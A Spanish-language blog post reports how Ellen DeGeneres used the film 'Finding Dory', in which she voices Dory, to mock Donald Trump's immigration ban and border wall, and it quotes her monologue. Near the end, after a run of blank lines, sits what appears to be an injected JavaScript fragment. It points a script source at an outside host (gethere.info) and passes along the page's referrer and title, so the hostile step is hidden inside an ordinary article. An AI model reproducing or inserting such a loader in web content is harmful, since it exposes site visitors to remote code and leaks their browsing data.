Ellen DeGeneres con ayuda de ‘Dory’ le da lección a Trump

La conductora explicó la agresión migratoria de Donal Trump a través de la película ‘Buscando a Dory’.

Ellen DeGeneres, es una de las presentadoras más influyentes de Estados Unidos y se ha convertido en un fenómeno mundial por sus irreverencias en televisión y sus entrevistas con los famosos. Además de que se ha colocado como toda una líder de opinión frente a la comunidad LGBTI.

Recientemente la conductora utilizó la sátira y la ironía, para hablar sobre cuestiones de la política y de las constantes agresiones migratorias de Donald Trump.

Ellen no podía pasar por alto la prohibición de la entrada de musulmanes al país americano y la construcción del muro para México. Utilizó la película ‘Buscando a Dory’ para explicar las medidas que ha tomado el actual presidente en contra de los inmigrantes.

DeGeneres fue la encargada de hacer la voz de “Dory” en la cinta y tras enterarse que Trump había pedido proyectar esta película en la Casa Blanca, no perdió la oportunidad de señalar la ironía que había detrás de esto y aclarar al presidente el mensaje que en realidad tiene la película.

Dory es australiana y tiene la misión de localizar a sus padres que están en América. No sé qué religión son, pero su padre suena un poco judío. No importa, el caso es que a Dory y sus amigos, una vez en América, les prohiben entrar ya que hay un gran muro. Todos ellos tienen que superar el muro y no lo creerán, pero ese muro no tiene casi ningún efecto en mantenerlos fuera y todos los animales se ayudan para que Dory cruce ese muro”, explicó la presentadora.

Con esta critica, la conductora le dio una gran lección al Presidente y sus políticas de discriminación, con las que pretende empedrar más a la unión americana.

 

 

 

 

 

 

 

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado